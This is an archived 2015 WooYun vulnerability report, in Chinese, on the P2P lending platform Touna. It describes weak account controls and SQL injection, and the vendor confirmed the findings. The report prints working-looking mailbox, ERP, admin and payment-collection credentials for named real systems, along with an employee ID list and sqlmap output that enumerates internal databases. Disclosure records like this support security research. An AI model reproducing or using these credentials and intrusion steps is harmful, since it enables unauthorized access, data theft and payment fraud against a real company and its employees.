乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-05: 细节已通知厂商并且等待厂商处理中 2015-05-06: 厂商已经确认,细节仅向厂商公开 2015-05-16: 细节向核心白帽子及相关领域专家公开 2015-05-26: 细节向普通白帽子公开 2015-06-05: 细节向实习白帽子公开 2015-06-20: 细节向公众公开
p2p金融安全之投哪网漏洞打包(账户体系控制不严至多个系统沦陷、sql注入等)
mail.itouzi.com腾讯企业邮箱利用smtp接口及常见用户名爆破得弱口令邮箱
[Y]:[email protected] : touna123[Y]:[email protected] : touna123[Y]:[email protected] : touna123 各个平台开发者账号都使用的这个邮箱,可以替换应用[Y]:[email protected] : touna123[Y]:[email protected] : touna2014[Y]:[email protected] : a123456[Y]:[email protected] : a123456[Y]:[email protected] : a123456
http://erp.touna.cn:9090/logout.action
guoyanfei 123456wuyehui 123456huanglina 123456qiqi 123456zhuyuanping zhuyuanping123qiuyouliang qiuyouliang123
http://acc.rxdai.com:8585/EmployeeQuery/Login.aspx密码:123456
WJ10273WJ10397WJ10420WJ10445WJ10450WJ10569WJ10596WJ10793WJ10882WJ10883WJ10884WJ10886WJ12227WJ12253WJ10161WJ12039WJ10538WJ10545WJ12792WJ12793WJ13319WJ10164WJ10457WJ10582WJ10626WJ10770WJ10003WJ10769WJ12586WJ10435WJ10745WJ10836WJ10888WJ12398WJ10316WJ10377WJ10471WJ10476WJ10480WJ10542WJ10622WJ10636WJ10766WJ10881WJ10121WJ10459WJ10479WJ10351WJ10390WJ10597WJ10779WJ10784
该系统存在多处注入
查询出存在注入
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[22:52:38] [INFO] fetching database names[22:52:38] [INFO] fetching number of databases[22:52:38] [INFO] retrieved: 9[22:52:46] [INFO] retrieved: HROA_0305[22:54:07] [INFO] retrieved: HROA_test[22:55:31] [INFO] retrieved: HROA_TOUNA[22:56:54] [INFO] retrieved: master[22:57:49] [INFO] retrieved: model[22:58:40] [INFO] retrieved: msdb[23:00:03] [INFO] retrieved: ReportServer[23:01:59] [INFO] retrieved: ReportServerTempDB[23:04:49] [INFO] retrieved: tempdbavailable databases [9]:[*] HROA_0305[*] HROA_test[*] HROA_TOUNA[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
业务员进单查看地址为:http://222.128.7.115:8090/borrowapply/ 登录用户名为:sysadmin 密码为:123456
商户代码:0005840F0097351 代收操作员代码:SK097351czy05 操作员密码: SZ963147WJ(总部资金管理组扣款、包括直销部、发标客服、出纳人员查询使用,不得私自修改账号密码) 代收复核员代码:SK097351fhy 复核员密码: SZ20120512WJ(只有一个复核员账号,全部人员共用,不得私自修改账号)新的代收复核员说是查不了协议库,请用回这个复核员号码代收代付复核员代码:szwjxxzxfhy复核员密码:?olyys3hm401?
危害等级:高
漏洞Rank:14
确认时间:2015-05-06 11:31
这些漏洞会导致公司内部一些重要管理信息的泄露。
暂无